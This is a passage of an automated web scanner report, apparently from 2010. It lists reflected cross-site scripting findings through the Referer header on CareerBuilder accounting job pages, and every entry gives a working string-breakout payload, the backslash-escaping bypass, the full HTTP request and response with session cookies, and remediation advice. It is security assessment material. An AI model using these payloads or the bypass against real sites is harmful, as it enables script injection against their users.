/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.254. http://accounting.careerbuilder.com/ag.ic/Florida/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56918\'%3balert(1)//e3aa076828a was submitted in the Referer HTTP header. This input was echoed as 56918\\';alert(1)//e3aa076828a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida/?lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=56918\'%3balert(1)//e3aa076828a

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 179849
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:17:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Florid
...[SNIP]...
lts';
s_cb.eVar5='JS_AS_State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 56918\\';alert(1)//e3aa076828a';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.255. http://accounting.careerbuilder.com/ag.ic/Florida/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6309b\'%3balert(1)//59d7ac59f1b was submitted in the Referer HTTP header. This input was echoed as 6309b\\';alert(1)//59d7ac59f1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida/ HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=6309b\'%3balert(1)//59d7ac59f1b

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 180061
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 14 Nov 2010 23:00:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Florid
...[SNIP]...
lts';
s_cb.eVar5='JS_AS_State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 6309b\\';alert(1)//59d7ac59f1b';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.256. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f480a\'%3balert(1)//b802c5c94bd was submitted in the Referer HTTP header. This input was echoed as f480a\\';alert(1)//b802c5c94bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=f480a\'%3balert(1)//b802c5c94bd

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176225
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sun, 14 Nov 2010 23:00:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - f480a\\';alert(1)//b802c5c94bd';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.257. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64d8c\'%3balert(1)//f4ef47d3f32 was submitted in the Referer HTTP header. This input was echoed as 64d8c\\';alert(1)//f4ef47d3f32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami?lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=64d8c\'%3balert(1)//f4ef47d3f32

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176040
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR4
Date: Sun, 14 Nov 2010 23:12:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 64d8c\\';alert(1)//f4ef47d3f32';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.258. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9545f\'%3balert(1)//6cfbcaa7226 was submitted in the Referer HTTP header. This input was echoed as 9545f\\';alert(1)//6cfbcaa7226 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh031 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9545f\'%3balert(1)//6cfbcaa7226

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176553
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=cbcb0fadca3b47c1a9569e6e471e16f6-343070704-RF-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650561189DB47D6ABB196DB4CB014BD6697662C7951FB969626D18C76975F0BABBE1A91E862CEC15D12; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:03 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:03 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL15
Date: Sun, 14 Nov 2010 22:25:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar8='JS_FindJobs - Job Results';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 9545f\\';alert(1)//6cfbcaa7226';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.259. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45845\'%3balert(1)//4dd1c60a594 was submitted in the Referer HTTP header. This input was echoed as 45845\\';alert(1)//4dd1c60a594 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami/ HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=45845\'%3balert(1)//4dd1c60a594

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176514
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=29994ae3a58f499198496a89a94deeb1-343070587-R3-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650E3907A73E359AD0C717375E6A181228710E52CC9569A7C897CB7D71421C75C1B4E5777777724DBD7; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:23:06 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:38:07 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL3
Date: Sun, 14 Nov 2010 22:23:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar8='JS_FindJobs - Job Results';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 45845\\';alert(1)//4dd1c60a594';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.260. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/JobResults.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami/JobResults.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 480ef\'%3balert(1)//4797d19bb95 was submitted in the Referer HTTP header. This input was echoed as 480ef\\';alert(1)//4797d19bb95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami/JobResults.aspx HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=480ef\'%3balert(1)//4797d19bb95

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 42228
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 14 Nov 2010 22:56:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   404 Fi
...[SNIP]...
Name='accounting.careerbuilder.com/404.aspx';
s_cb.server='accounting';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 480ef\\';alert(1)//4797d19bb95';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.261. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Accounting.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Accounting.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1da0c\'%3balert(1)//d1efdea3b87 was submitted in the Referer HTTP header. This input was echoed as 1da0c\\';alert(1)//d1efdea3b87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami_Accounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=1da0c\'%3balert(1)//d1efdea3b87

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174866
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR43
Date: Sun, 14 Nov 2010 23:16:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 1da0c\\';alert(1)//d1efdea3b87';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.262. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Accounting.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Accounting.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c01d8\'%3balert(1)//66349a66c26 was submitted in the Referer HTTP header. This input was echoed as c01d8\\';alert(1)//66349a66c26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami_Accounting.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=c01d8\'%3balert(1)//66349a66c26

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174676
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR19
Date: Sun, 14 Nov 2010 23:00:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
